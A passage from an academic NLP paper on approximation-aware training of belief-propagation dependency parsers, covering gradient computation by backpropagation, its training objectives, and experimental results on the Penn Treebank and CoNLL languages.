used by Domke (2011). Gradient Computation To compute the gradi- ent ∇θJ(θ;x,y∗) of the loss on a single sentence (x,y∗) = (x(d),y(d)), we apply automatic differ- entiation (AD) in the reverse mode (Griewank and Corliss, 1991). This yields the same type of “back- propagation” algorithm that has long been used for training neural networks (Rumelhart et al., 1986). It is important to note that the resulting gradient com- putation algorithm is exact up to floating-point er- ror, and has the same asymptotic complexity as the original decoding algorithm, requiring only about twice the computation. The AD method applies pro- vided that the original function is indeed differen- tiable with respect to θ. In principle, it is possi- ble to compute the gradient with minimal additional coding. There exists AD software (some listed at autodiff.org) that could be used to derive the necessary code automatically. Another option would be to use the perturbation method of Domke (2010). However, we implemented the gradient computation directly, and we describe it here. Inference, Decoding, and Loss as a Feedfoward Circuit The backpropagation algorithm is often applied to neural networks, where the topology of a feedforward circuit is statically specified and can be applied to any input. Our BP algorithm, decoder, and loss function similarly define a feedfoward cir- cuit that computes our function J. The circuit’s depth depends on the number of BP timesteps, tmax. Its topology is defined dynamically (per sentence x(d)) by “unrolling” the computation into a graph. Figure 2 shows this topology. The high level modules consist of (A) computing potential func- tions, (B) initializing messages, (C) sending mes- sages, (D) computing beliefs, and (E) decoding and computing the loss. We zoom in on two submodules: the first computes messages from the PTREE factor efficiently (C.1–C.3); the second computes a soft- ened version of our loss function (E.1–E.3). Both of these submodules are made efficient by the inside- outside algorithm. The next two sections describe in greater detail 492 autodiff.org how we define the function J (the forward pass) and how we compute its gradient (the backward pass). Backpropagation through the circuit from Figure 2 poses several challenges. Eaton and Ghahramani (2009), Stoyanov et al. (2011), and Domke (2011) showed how to backpropagate through the basic BP algorithm, and we reiterate the key details below (§5.2). The remaining challenges form the primary technical contribution of this paper: 1. Our true loss function `(hθ(x),y∗) by way of the decoder hθ contains an argmax (3) over trees and is therefore not differentiable. We show how to soften this decoder (by substitut- ing a softmax), making it differentiable (§4.1). 2. Empirically, we find the above objective diffi- cult to optimize. To address this, we substitute a simpler L2 loss function (commonly used in neural networks). This is easier to optimize and yields our best parsers in practice (§4.2). 3. We show how to run backprop through the inside-outside algorithm on a hypergraph (§5.4) for use in two modules: the softened decoder (§5.1) and computation of messages from the PTREE factor (§5.3). This allows us to go be- yond Stoyanov et al. (2011) and train struc- tured BP in an approximation-aware and loss- aware fashion. 4 Differentiable Objective Functions 4.1 Annealed Risk Minimizing the test-time loss is the appropriate goal for training an approximate system like ours. That loss is estimated by the empirical risk on a large amount of in-domain supervised training data. Alas, this risk is nonconvex and piecewise con- stant, so we turn to deterministic annealing (Smith and Eisner, 2006) and clever initialization. Directed dependency error, `(hθ(x),y∗), is not differentiable due to the argmax in the decoder hθ. So we redefine J(θ;x,y∗) to be a new differentiable loss function, the annealed risk R1/Tθ (x,y ∗), which approaches the loss `(hθ(x),y∗) as the temperature T → 0. Our first step is to define a distribution over parses, which takes the marginals pθ(yi = ON |x) as input, or in practice, their BP approximations bi(ON): q 1/T θ (ŷ |x) ∝ exp (∑ i:ŷi=ON pθ(yi=ON |x) T ) (10) (E) Decode and Loss J(θ;x,y∗) = (E.3) Expected Recall (E.2) Inside-Outside (E.1) Anneal Beliefs (D) Beliefs bi(yi) = . . ., bα(yα) = . . . (C) Messages at time tmax m (tmax) i→α (yi) = . . ., m (tmax) α→i (yi) = . . . m (tmax) PTREE→i(yi) = (C.3) Outgoing Messages (C.2) Inside-Outside (C.1) Message Ratios · · · (C) Messages at time t m (t) i→α(yi) = . . ., m (t) α→i(yi) = . . . m (t) PTREE→i(yi) = (C.3) Outgoing Messages (C.2) Inside-Outside (C.1) Message Ratios · · · (C) Messages at time t = 1 m (1) i→α(yi) = . . ., m (1) α→i(yi) = . . . m (1) PTREE→i(yi) = (C.3) Outgoing Messages (C.2) Inside-Outside (C.1) Message Ratios (A) Compute Potentials ψα(yα) = exp(θ ·f(yα,x)) (B) Initial Messages m (0) i→α(yi) = 1 m (0) α→i(yi) = 1 (C.3) Outgoing Messages (C.2) Inside-Outside (C.1) Message Ratios (E.3) Expected Recall (E.2) Inside-Outside (E.1) Anneal Beliefs Figure 2: Feed-forward topology of inference, decoding, and loss. (E.1–E.3) show the annealed risk, one of the objective functions we consider. Using this distribution, we can replace our non- differentiable decoder hθ with a differentiable one (at training time). Imagine that our new decoder stochastically returns a parse ŷ sampled from this distribution. We define the annealed risk as the ex- pected loss of that decoder: R 1/T θ (x,y ∗) = E ŷ∼q1/T θ (· |x)[`(ŷ,y ∗)] (11) As T → 0 (“annealing”), the decoder almost always chooses the MBR parse,7 so our risk approaches the loss of the actual MBR decoder that will be used at test time. However, as a function of θ, it remains differentiable (though not convex) for any T > 0. To compute the annealed risk, observe that it sim- plifies to R1/Tθ (x,y ∗) = − ∑ i:y∗i =ON q 1/T θ (ŷi = ON |x). This is the negated expected recall of a parse ŷ ∼ q1/Tθ . We obtain the required marginals q 1/T θ (ŷi = ON |x) from (10) by running inside- 7Recall from (3) that the MBR parse is the tree ŷ that max- imizes the sum ∑ i:ŷi=ON pθ(yi = ON |x). As T → 0, the right-hand side of (10) grows fastest for this ŷ, so its probabil- ity under q1/Tθ approaches 1 (or 1/k if there is a k-way tie for MBR parse). 493 outside where the edge weight for edge i is given by exp(pθ(yi = ON |x)/T). Whether our test-time system computes the marginals of pθ exactly or does so approximately via BP, our new training objective approaches (as T → 0) the true empirical risk of the test-time parser that performs MBR decoding from the computed marginals. Empirically, however, we will find that it is not the most effective training objective (§7.2). Stoyanov et al. (2011) postulate that the nonconvex- ity of empirical risk may make it a difficult function to optimize, even with annealing. Our next two ob- jectives provide alternatives. 4.2 L2 Distance We can view our inference, decoder, and loss as defining a form of deep neural network, whose topology is inspired by our linguistic knowledge of the problem (e.g., the edge variables should define a tree). This connection to deep learning allows us to consider training methods akin to supervised layer-wise training (Bengio et al., 2007). We tem- porarily remove the top layers of our network (i.e. the decoder and loss module, Fig. 2 (E)) so that the output layer of our “deep network” consists of the variable beliefs bi(yi) from BP. We can then de- fine a supervised loss function directly on these be- liefs. We don’t have supervised data for this layer of beliefs, but we can create it artificially. Use the supervised parse y∗ to define “target beliefs” by b∗i (yi) = I(yi = y ∗ i ) ∈ {0,1}. To find parame- ters θ that make BP’s beliefs close to these targets, we can minimize an L2 distance loss function: J(θ;x,y∗) = ∑ i ∑ yi (bi(yi)− b∗i (yi))2 (12) We can use this L2 distance objective function for training, adding the MBR decoder and loss evalua- tion back in only at test time. 4.3 Layer-wise Training Just as in layer-wise training of neural networks, we can take a two-stage approach to training. First, we train to minimize the L2 distance. Then, we use the resulting θ as initialization to optimize the annealed risk, which does consider the decoder and loss func- tion (i.e. the top layers of Fig. 2). Stoyanov et al. (2011) found mean squared error (MSE) to give a smoother training objective, though still nonconvex, and used it to initialize empirical risk. Though their variant of the L2 objective did not completely dis- pense with the decoder as ours does, it is a similar approach to our proposed layer-wise training. 5 Gradients by Backpropagation Backpropagation computes the derivative of any given function specified by an arbitrary circuit con- sisting of elementary differentiable operations (e.g. +,−,×,÷, log,exp). This is accomplished by re- peated application of the chain rule. Backpropagat- ing through an algorithm proceeds by similar ap- plication of the chain rule, where the intermediate quantities are determined by the topology of the circuit—just as in Figure 2. Running backwards through the circuit, backprop computes the partial derivatives of the objective J(θ;x,y∗) with respect to each intermediate quantity u—or more concisely the adjoint of u: ðu = ∂J(θ;x,y ∗) ∂u . This section gives a summary of the adjoint computations we re- quire. Due to space constraints, we direct the reader to the extended version of this paper (Gormley et al., 2015a) for full details of all the adjoints. 5.1 Backpropagation of Decoder / Loss The adjoint of the objective itself ðJ(θ;x,y∗) is al- ways 1. So the first adjoints we must compute are those of the beliefs: ðbi(yi) and ðbα(yα). This cor- responds to the backward pass through Figure 2 (E). Consider the simple case where J is L2 distance from (12): the variable belief adjoint is ðbi(yi) = 2(bi(yi)−b∗i (yi)) and trivially ðbα(yα) = 0. If J is annealed risk from (11), we compute ðbi(yi) by ap- plying backpropagation recursively to our algorithm for J from §4.1. This sub-algorithm defines a sub- circuit depicted in Figure 2 (E.1–E.3). The compu- tations of the annealed beliefs and the expected re- call are easily differentiable. The main challenge is differentiating the function computed by the inside- outside algorithm; we address this in §5.4. 5.2 Backpropagation through Structured BP Given the adjoints of the beliefs, we next back- propagate through structured BP—extending prior work which did the same for regular BP (Eaton and Ghahramani, 2009; Stoyanov et al., 2011; Domke, 494 2011). Except for the messages sent from the PTREE factor, each step of BP computes some value from earlier values using the update equa- tions (4)–(7). Backpropagation differentiates these elementary expressions. First, using the belief ad- joints, we compute the adjoints of the final mes- sages (ðm(tmax)j→α (yj), ðm (tmax) β→i (yi)) by applying the chain rule to Eqs. (6) and (7). This is the backward pass through Fig. 2 (D). Recall that the messages at time t were computed from messages at time t − 1 and the potential functions ψα in the forward pass via Eqs. (4) and (5). Backprop works in the oppo- site order, updating the adjoints of the messages at time t−1 and the potential functions (ðm(t−1)j→α (yj), ðm(t−1)β→i (yi), ðψα(yα)) only after it has computed the adjoints of the messages at time t. Repeating this through timesteps {t,t − 1, . . . ,1} constitutes the backward pass through Fig. 2 (C). The backward pass through Fig. 2 (B) does nothing, since the mes- sages were initialized to a constant. The final step of backprop uses ðψα(yα) to compute ðθj—the back- ward pass through Fig. 2 (A). For the explicit for- mula of these adjoints, see Gormley et al. (2015a) or Appendix A.1 of Stoyanov et al. (2011). The next section handles the special case of ðm(t)j→PTREE(yj). 5.3 BP and Backpropagation with PTREE The PTREE factor has a special structure that we exploit for efficiency during BP. Smith and Eis- ner (2008) give a more efficient way to implement Eq. (5), which computes the message from a fac- tor α to a variable yi, in the special case where α = PTREE. They first run the inside-outside al- gorithm where the edge weights are given by the ra- tios of the messages to PTREE: m (t) i→α(ON) m (t) i→α(OFF) . Then they multiply each resulting edge marginal given by inside-outside by the product of all the OFF mes- sages ∏ i m (t) i→α(OFF) to get the marginal factor be- lief bα(yi). Finally they divide the belief by the in- coming message m(t)i→α(ON) to get the correspond- ing outgoing message m(t+1)α→i (ON). These steps are shown in Figure 2 (C.1–C.3), and are repeated each time we send a message from the PTree factor. Similarly, we exploit the structure of this algo- rithm to compute the adjoints ðm(t)j→PTREE(yj). The derivatives of the message ratios and products men- tioned here are simple. In the next subsection, we explain how to backpropagate through the inside- outside algorithm. Though we focus here on pro- jective dependency parsing, our techniques are also applicable to non-projective parsing and the TREE factor; we leave this to future work. 5.4 Backprop of Hypergraph Inside-Outside Both the annealed risk loss function (§4.1) and the computation of messages from the PTREE factor (§5.3) use the inside-outside algorithm for depen- dency parsing. Here we describe inside-outside and the accompanying backpropagation algorithm over a hypergraph. This general treatment (Klein and Man- ning, 2001; Li and Eisner, 2009) enables our method to be applied to other tasks such as constituency parsing, HMM forward-backward, and hierarchical machine translation. In the case of dependency pars- ing, the structure of the hypergraph is given by the dynamic programming algorithm of Eisner (1996). For the forward pass of the inside-outside mod- ule, the input variables are the hyperedge weights we∀e and the outputs are the marginal probabilities pw(i)∀i of each node i in the hypergraph. The latter are a function of the inside βi and outside αj proba- bilities. We initialize αroot = 1. βi = ∑ e∈I(i) we ∏ j∈T(e) βj (13) αj = ∑ e∈O(i) we αH(e) ∏ j∈T(e):j 6=i βj (14) pw(i) = αiβi/βroot (15) For each node i, we define the set of incoming edges I(i) and outgoing edges O(i). The antecedents of the edge are T(e), the parent of the edge is H(e), and its weight is we. For the backward pass of the inside-outside module, the inputs are ðpw(i)∀i and the outputs are ðwe∀e. We also compute the adjoints of the inter- mediate quantities ðβj,ðαi. We first compute ðαi bottom-up. Next ðβj are computed top-down. The adjoints ðwe are then computed in any order. ðαi = ðpw(i) ∂pw(i) ∂αi + ∑ e∈I(i) ∑ j∈T(e) ðαj ∂αj ∂αi (16) ðβroot = ∑ i 6=root ðpw(i) ∂pw(i) ∂βroot (17) 495 ðβj = ðpw(j) ∂pw(j) ∂βj + ∑ e∈O(j) ðβH(e) ∂βH(e) ∂βj + ∑ e∈O(j) ∑ k∈T(e):k 6=j ðαk ∂αk∂βj ∀j 6= root (18) ðwe = ðβH(e) ∂βH(e) ∂we + ∑ j∈T(e) ðαj ∂αj ∂we (19) The partial derivatives required for the above ad- joints are given in the extended version of this pa- per (Gormley et al., 2015a). This backpropagation method is used for both Figure 2 (C.2) and (E.2). 6 Other Learning Settings Loss-aware Training with Exact Inference Backpropagating through inference, decoder, and loss need not be restricted to approximate inference algorithms. Li and Eisner (2009) optimize Bayes risk with exact inference on a hypergraph for machine translation. Each of our differentiable loss functions (§4) can also be coupled with exact inference. For a first-order parser, BP is exact. Yet, in place of modules (B), (C), and (D) in Figure 2, we can use a standard dynamic programming algorithm for dependency parsing, which is simply another instance of inside-outside on a hypergraph (§5.4). The exact marginals from inside-outside (15) are then fed forward into the decoder/loss module (E). Conditional and Surrogate Log-likelihood The standard approach to training is conditional log- likelihood (CLL) maximization (Smith and Eisner, 2008) without taking inexact inference into account: J(θ;x,y∗) = − log pθ(y |x). When inference is exact, this baseline computes the true gradient of CLL. When inference is approximate, this base- line uses the factor beliefs bα(yα) from BP in place of the exact marginals in the gradient. The liter- ature refers to this approximation-unaware training method as surrogate likelihood training since it re- turns the “wrong” parameters even under the as- sumption of infinite training data drawn from the model being used (Wainwright, 2006). Despite this, the surrogate likelihood objective is commonly used to train CRFs. CLL and approximation-aware train- ing are not mutually exclusive. Training a standard factor graph with ERMA and a log-likelihood objec- tive recovers CLL exactly (Stoyanov et al., 2011). 7 Experiments 7.1 Setup Features As the focus of this work is on a novel approach to training, we look to prior work for model and feature design (§2). We add O(n3) second-order grandparent and arbitrary-sibling fac- tors as in Riedel and Smith (2010) and Martins et al. (2010). We use standard feature sets for first-order (McDonald et al., 2005) and second-order (Carreras, 2007) parsing. Following Rush and Petrov (2012), we also include a version of each part-of-speech (POS) tag feature, with the coarse tags from Petrov et al. (2012). We use feature hashing (Ganchev and Dredze, 2008; Weinberger et al., 2009) and restrict to at most 20 million features. We leave the incor- poration of third-order features to future work. Pruning To reduce the time spent on feature ex- traction, we enforce the type-specific dependency length bounds from Eisner and Smith (2005) as used by Rush and Petrov (2012): the maximum allowed dependency length for each tuple (parent tag, child tag, direction) is given by the maximum observed length for that tuple in the training data. Follow- ing Koo and Collins (2010), we train a first-order model with CLL and for each token prune any par- ents for which the marginal probability is less than 0.0001 times the maximum parent marginal for that token. On a per-token basis, we further restrict to the ten parents with highest marginal probability as in Martins et al. (2009) (but we avoid pruning the fully right-branching tree, so that some parse always exists).8 This lets us simplify the factor graph, re- moving variables yi corresponding to pruned edges and specializing their factors to assume yi = OFF. We train the full model’s parameters to work well on this pruned graph. Data We consider 19 languages from the CoNLL- 2006 (Buchholz and Marsi, 2006) and CoNLL-2007 (Nivre et al., 2007) Shared Tasks. We also convert the English Penn Treebank (PTB) (Marcus et al., 1993) to dependencies using the head rules from Ya- mada and Matsumoto (2003) (PTB-YM). We evalu- ate unlabeled attachment accuracy (UAS) using gold 8The pruning model uses a simpler feature set as in Rush and Petrov (2012). Pruning is likely the least impactful of our approximations: it obtains 99.46% oracle UAS for English. 496 88.0 89.0 90.0 91.0 92.0 93.0 1 2 3 4 5 6 7 8 U A S # Iterations of BP CLL L2 L2+AR Figure 3: Speed/accuracy tradeoff of English PTB-YM UAS vs. the total number of BP iterations tmax for standard conditional likelihood training (CLL) and our approximation-aware training with either an L2 objective (L2) or a staged training of L2 followed by annealed risk (L2+AR). Note that the x-axis shows the number of iter- ations used for both training and testing. We use a 2nd- order model with Grand.+Sib. factors. POS tags for the CoNLL languages, and predicted tags from TurboTagger (Martins et al., 2013) for the PTB. Unlike most prior work, we hold out 10% of each CoNLL training dataset as development data for regularization by early stopping.9 Some of the CoNLL languages contain non- projective edges, but our system is built using a probability distribution over projective trees only. ERMA can still be used with such a badly misspec- ified model—one of its advantages—but no amount of training can raise CLL’s objective above −∞, since any non-projective gold tree will always have probability 0. Thus, for CLL only, we replace each gold tree in training data with a minimum-loss projective tree (Carreras, 2007).10 This resembles ERMA’s goal of training the system to find a low- loss projective tree. At test time, we always evaluate the system’s projective output trees against the pos- sibly non-projective gold trees, as in prior work. Learning Settings We compare three learning set- tings. The first, our baseline, is conditional log- 9In dev experiments, we found L2 distance to be less sensi- tive to the `2-regularizer weight than CLL. So we added addi- tional regularization by early stopping to improve CLL. 10We also ran a controlled experiment with L2 and not just CLL trained on these projectivized trees: the average margin of improvement for our method widened very slightly. 90.5 91 91.5 92 92.5 Unary Grand. Sib. Grand.+Sib. U A S CLL L2 L2+AR Figure 4: English PTB-YM UAS vs. the types of 2nd- order factors included in the model for approximation- aware training and standard conditional likelihood train- ing. All models include 1st-order factors (Unary). The 2nd-order models include grandparents (Grand.), arbi- trary siblings (Sib.), or both (Grand.+Sib.)—and use 4 iterations of BP. likelihood training (CLL) (§6). As is common in the literature, we conflate two distinct learning settings (conditional log-likelihood/surrogate log- likelihood) under the single name “CLL,” allowing the inference method (exact/inexact) to differentiate them. The second learning setting is approximation- aware learning (§3) with either our L2 distance ob- jective (L2) (§4.2) or our layer-wise training method (L2+AR) which takes the L2-trained model as an ini- tializer for our annealed risk (§4.3). The annealed risk objective requires an annealing schedule: over the course of training, we linearly anneal from ini- tial temperature T = 0.1 to T = 0.0001, updat- ing T at each step of stochastic optimization. The third learning setting uses the same two objectives, L2 and L2+AR, but with exact inference (§6). The `2-regularizer weight in (8) is λ = 1. Each method is trained by AdaGrad for 5 epochs with early stopping (i.e. the model with the highest score on dev data is returned). Across CoNLL, the average epoch chosen for CLL was 2.02 and for L2 was 3.42. The learning rate for each training run is dynamically tuned on a sample of the training data. 7.2 Results Our goal is to demonstrate that our approximation- aware training method leads to improved parser ac- curacy as compared with the standard training ap- proach of conditional log-likelihood (CLL) maxi- mization (Smith and Eisner, 2008), which does not 497 take inexact inference into account. The two key findings of our experiments are that our learning ap- proach is more robust to (1) decreasing the number of iterations of BP and (2) adding additional cycles to the factor graph in the form of higher-order fac- tors. In short: our approach leads to faster inference and creates opportunities for more accurate parsers. Speed-Accuracy Tradeoff Our first experiment is on English dependencies. For English PTB-YM, Figure 3 shows accuracy as a function of the num- ber of BP iterations for our second-order model with both arbitrary sibling and grandparent factors on En- glish. We find that our training methods (L2 and L2+AR) obtain higher accuracy than standard train- ing (CLL), particularly when a small number of BP iterations are used and the inference is a worse ap- proximation. Notice that with just two iterations of BP, the parsers trained by our approach obtain ac- curacy greater than or equal to those by CLL with any number of iterations (1 to 8). Contrasting the two objectives for our approximation-aware train- ing, we find that our simple L2 objective performs very well. In fact, in only two cases, at 3 and 5 itera- tions, does risk annealing (L2+AR) further improve performance on test data. In our development exper- iments, we also evaluated AR without using L2 for initialization and we found that it performed worse than either of CLL and L2 alone. That AR performs only slightly better than L2 (and not worse) in the case of L2+AR is likely due to early stopping on dev data, which guards against selecting a worse model. Increasingly Cyclic Models Figure 4 contrasts accuracy with the type of 2nd-order factors (grand- parent, sibling, or both) included in the model for English, for a fixed budget of 4 BP iterations. Adding higher-order factors introduces more loops, making the loopy BP approximation more problem- atic for standard CLL training. By contrast, under approximation-aware training, enriching the model with more factors always helps performance, as de- sired, rather than hurting it. Notice that our advantage is not restricted to the case of loopy graphs. Even when we use a 1st- order model, for which BP inference is exact, our approach yields higher-accuracy parsers than CLL training. We speculate that this improvement is due to our method’s ability to better deal with model TRAIN INFERENCE DEV UAS TEST UAS CLL Exact 91.99 91.62 CLL BP 4 iters 91.37 91.25 L2 Exact 91.91 91.66 L2 BP 4 iters 91.83 91.63 Table 1: The impact of exact vs. approximate inference on a 2nd-order model with grandparent factors only. Re- sults are for the development (§ 22) and test (§ 23) sec- tions of PTB-YM. misspecification—a first-order model is quite mis- specified! Note the following subtle point: when inference is exact, the CLL estimator is actually a special case of our approximation-aware learner— that is, CLL computes the same gradient that our training by backpropagation would if we used log- likelihood as the objective. Exact Inference with Grandparents §2 noted that since we always do MBR decoding, the ideal strategy is to fit the true distribution with a good model. Consider a “good model” that includes unary and grandparent factors. Exact inference is possible here in O(n4) time by dynamic programming (Koo and Collins, 2010, Model 0). Table 1 shows that CLL training with exact inference indeed does well on test data—but that accuracy falls if we substitute fast approximate inference (4 iterations of BP). Our proposed L2 training is able to close the gap, just as intended. That is, we succesfully train a few itera- tions of an approximate O(n3) algorithm to behave as well as an exact O(n4) algorithm. Other Languages Our final experiments train and test our parsers on 19 languages from CoNLL- 2006/2007 (Table 2). We find that, on average across languages, approximation-aware training with an L2 objective obtains higher UAS than CLL training. This result holds for both our poorest model (1st- order) and our richest one (2nd-order with grandpar- ent and sibling factors), using 1, 2, 4, or 8 iterations of BP. Notice that the approximation-aware train- ing doesn’t always outperform CLL training—only in the aggregate. Again, we see the trend that our training approach yields larger gains when BP is re- stricted to a small number of maximum iterations. It is possible that larger training sets would also favor our approach, by providing a clearer signal of how to reduce the objective (8). 498 1ST-ORDER 2ND-ORDER (WITH GIVEN NUM. BP ITERATIONS) 1 2 4 8 LANGUAGE CLL L2 − CLL CLL L2 − CLL CLL L2 − CLL CLL L2 − CLL CLL L2 − CLL AR 77.63 -0.26 73.39 +2.21 77.05 -0.17 77.20 +0.02 77.16 -0.07 BG 90.38 -0.76 89.18 -0.45 90.44 +0.04 90.73 +0.25 90.63 -0.19 CA 90.47 +0.30 88.90 +0.17 90.79 +0.38 91.21 +0.78 91.49 +0.66 CS 84.69 -0.07 79.92 +3.78 82.08 +2.27 83.02 +2.94 81.60 +4.42 DA 87.15 -0.12 86.31 -1.07 87.41 +0.03 87.65 -0.11 87.68 -0.10 DE 88.55 +0.81 88.06 0.00 89.27 +0.46 89.85 -0.05 89.87 -0.07 EL 82.43 -0.54 80.02 +0.29 81.97 +0.09 82.49 -0.16 82.66 -0.04 EN 88.31 +0.32 85.53 +1.44 87.67 +1.82 88.63 +1.14 88.85 +0.96 ES 81.49 -0.09 79.08 -0.37 80.73 +0.14 81.75 -0.66 81.52 +0.02 EU 73.69 +0.11 71.45 +0.85 74.16 +0.24 74.92 -0.32 74.94 -0.38 HU 78.79 -0.52 76.46 +1.24 79.10 +0.03 79.07 +0.60 79.28 +0.31 IT 84.75 +0.32 84.14 +0.04 85.15 +0.01 85.66 -0.51 85.81 -0.59 JA 93.54 +0.19 93.01 +0.44 93.71 -0.10 93.75 -0.26 93.47 +0.07 NL 76.96 +0.53 74.23 +2.08 77.12 +0.53 78.03 -0.27 77.83 -0.09 PT 86.31 +0.38 85.68 -0.01 87.01 +0.29 87.34 +0.08 87.30 +0.17 SL 79.89 +0.30 78.42 +1.50 79.56 +1.02 80.91 +0.03 80.80 +0.34 SV 87.22 +0.60 86.14 -0.02 87.68 +0.74 88.01 +0.41 87.87 +0.37 TR 78.53 -0.30 77.43 -0.64 78.51 -1.04 78.80 -1.06 78.91 -1.13 ZH 84.93 -0.39 82.62 +1.43 84.27 +0.95 84.79 +0.68 84.77 +1.14 AVG. 83.98 +0.04 82.10 +0.68 83.88 +0.41 84.41 +0.19 84.34 +0.31 Table 2: Results on 19 languages from CoNLL-2006/2007. For languages appearing in both datasets, the 2006 version was used, except for Chinese (ZH). Evaluation follows the 2006 conventions and excludes punctuation. We report absolute UAS for the baseline (CLL) and the improvement in UAS for L2 over CLL (L2 − CLL) with positive/negative differences in blue/red. The average UAS and average difference across all languages (AVG.) is given. 8 Discussion The purpose of this work was to explore ERMA and related training methods for models which incorpo- rate structured factors. We applied these methods to a basic higher-order dependency parsing model, because that was the simplest and first instance of structured BP (Smith and Eisner, 2008). In future work, we hope to explore further models with struc- tured factors—particularly those which jointly ac- count for multiple linguistic strata (e.g. syntax, se- mantics, and topic). Another natural extension of this work is to explore other types of factors: here we considered only log-linear potential functions (com- monly used in CRFs), but any differentiable func- tion would be appropriate, such as a neural network (Durrett and Klein, 2015; Gormley et al., 2015b). Our primary contribution is approximation-aware training for structured BP. We have specifically presented message-passing formulas for any factor whose belief’s partition function can be computed as the total weight of all hyperpaths in a weighted hypergraph. This would suffice to train the struc- tured BP systems that have been built for projective dependency parsing (Smith and Eisner, 2008), CNF grammar parsing (Naradowsky et al., 2012), TAG (Auli and Lopez, 2011), ITG-constraints for phrase extraction (Burkett and Klein, 2012), and graphical models over strings (Dreyer and Eisner, 2009). 9 Conclusions We introduce a new approximation-aware learning framework for belief propagation with structured factors. We present differentiable objectives for both empirical risk minimization (à la ERMA) and a novel objective based on L2 distance between the in- ferred beliefs and the true edge indicator functions. Experiments on the English Penn Treebank and 19 languages from CoNLL-2006/2007 shows that our estimator is able to train more accurate dependency parsers with fewer iterations of belief propagation than standard conditional log-likelihood training, by taking approximations into account. For additional details, see the tech report version of this paper (Gormley et al., 2015a). Our code is available in a general-purpose library for structured BP, hyper- graphs, and backprop (Gormley, 2015). 499 Acknowledgments This research was funded by the Human Language Technology Center of Excel- lence at Johns Hopkins University. Thanks to the anonymous reviewers for their insightful comments. References Michael Auli and Adam Lopez. 2011. A comparison of loopy belief propagation and dual decomposition for integrated CCG supertagging and parsing. In Proceed- ings of ACL. Mohit Bansal, David Burkett, Gerard de Melo, and Dan Klein. 2014. Structured learning for taxonomy induc- tion with belief propagation. In Proceedings of ACL. Yoshua Bengio, Pascal Lamblin, Dan Popovici, and Hugo Larochelle. 2007. Greedy layer-wise training of deep networks. In B. Schölkopf, J.C. Platt, and T. Hoffman, editors, Advances in Neural Information Processing Systems 19. Peter J. Bickel and Kjell A. Doksum. 1977. Mathe- matical Statistics: Basic Ideas and Selected Topics. Holden-Day Inc., Oakland, CA, USA. Sabine Buchholz and Erwin Marsi. 2006. CoNLL-X shared task on multilingual dependency parsing. In Proceedings of CoNLL. David Burkett and Dan Klein. 2012. Fast inference in phrase extraction models with belief propagation. In Proceedings of NAACL-HLT. Xavier Carreras. 2007. Experiments with a higher-order projective dependency parser. In Proceedings of the CoNLL Shared Task Session of EMNLP-CoNLL 2007. Justin Domke. 2010. Implicit differentiation by pertur- bation. In Advances in Neural Information Processing Systems. Justin Domke. 2011. Parameter learning with truncated message-passing. In Proceedings of the IEEE Con- ference on Computer Vision and Pattern Recognition (CVPR). Markus Dreyer and Jason Eisner. 2009. Graphical mod- els over multiple strings. In Proceedings of EMNLP. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. The Journal of Machine Learning Research. Greg Durrett and Dan Klein. 2015. Neural CRF Parsing. In Proceedings of ACL. Frederik Eaton and Zoubin Ghahramani. 2009. Choos- ing a variable to clamp. In Proceedings of AISTATS. Jason Eisner and Noah A. Smith. 2005. Parsing with soft and hard constraints on dependency length. In Proceedings of the International Workshop on Parsing Technologies (IWPT). Jason Eisner. 1996. Three new probabilistic models for dependency parsing: An exploration. In Proceedings of COLING. Brendan J. Frey, Frank R. Kschischang, Hans-Andrea Loeliger, and Niclas Wiberg. 1997. Factor graphs and algorithms. In Proceedings of the Annual Allerton Conference on Communication Control and Comput- ing, volume 35. Kuzman Ganchev and Mark Dredze. 2008. Small sta- tistical models by random feature mixing. In Proceed- ings of the ACL08 HLT Workshop on Mobile Language Processing. Joshua Goodman. 1996. Efficient algorithms for parsing the DOP model. In Proceedings of EMNLP. Matthew R. Gormley, Mark Dredze, and Jason Eis- ner. 2015a. Approximation-aware dependency parsing by belief propagation (extended version). Technical report available from arXiv.org as arXiv:1508.02375. Matthew R. Gormley, Mo Yu, and Mark Dredze. 2015b. Improved relation extraction with feature-rich com- positional embedding models. In Proceedings of EMNLP. Matthew R. Gormley. 2015. Pacaya—a graphical mod- els and NLP library. Available from https:// github.com/mgormley/pacaya. Andreas Griewank and George F. Corliss, editors. 1991. Automatic Differentiation of Algorithms: Theory, Im- plementation, and Application. SIAM, Philadelphia, PA. Liang Huang, Suphan Fayong, and Yang Guo. 2012. Structured perceptron with inexact search. In Proceed- ings of NAACL-HLT. Dan Klein and Christopher D. Manning. 2001. Parsing and hypergraphs. In Proceedings of the International Workshop on Parsing Technologies (IWPT). Terry Koo and Michael Collins. 2010. Efficient third- order dependency parsers. In Proceedings of ACL. Frank R. Kschischang, Brendan J. Frey, and Hans- Andrea Loeliger. 2001. Factor graphs and the sum- product algorithm. IEEE Transactions on Information Theory, 47(2). Alex Kulesza and Fernando Pereira. 2008. Structured Learning with Approximate Inference. In Advances in Neural Information Processing Systems. Zhifei Li and Jason Eisner. 2009. First- and second-order expectation semirings with applications to minimum- risk training on translation forests. In Proceedings of EMNLP. Mitchell P. Marcus, Mary Ann Marcinkiewicz, and Beat- rice Santorini. 1993. Building a large annotated cor- pus of English: The penn treebank. Computational linguistics, 19(2). 500 arXiv.org https://github.com/mgormley/pacaya https://github.com/mgormley/pacaya André F. T. Martins, Noah A. Smith, and Eric P. Xing. 2009. Concise integer linear programming formula- tions for dependency parsing. In Proceedings of ACL- IJCNLP. André F. T. Martins, Noah A. Smith, Eric P. Xing, Pe- dro M. Q. Aguiar, and Mário A. T. Figueiredo. 2010. Turbo parsers: Dependency parsing by approximate variational inference. In Proceedings of EMNLP. André F. T. Martins, Miguel B. Almeida, and Noah A. Smith. 2013. Turning on the turbo: Fast third-order non-projective turbo parsers. In Proceedings of ACL. Ryan McDonald and Fernando Pereira. 2006. On- line learning of approximate dependency parsing al- gorithms. In Proceedings of EACL. Ryan McDonald, Koby Crammer, and Fernando Pereira. 2005. Online large-margin training of dependency parsers. In Proceedings of ACL. Kevin P. Murphy, Yair Weiss, and Michael I. Jordan. 1999. Loopy belief propagation for approximate in- ference: An empirical study. In Proceedings of UAI. Jason Naradowsky, Tim Vieira, and David A. Smith. 2012. Grammarless parsing for joint inference. In Proceedings of COLING. Joakim Nivre, Johan Hall, Sandra Kübler, Ryan McDon- ald, Jens Nilsson, Sebastian Riedel, and Deniz Yuret. 2007. The CoNLL 2007 shared task on dependency parsing. In Proceedings of the CoNLL Shared Task Session of EMNLP-CoNLL 2007. Slav Petrov, Dipanjan Das, and Ryan McDonald. 2012. A universal part-of-speech tagset. In 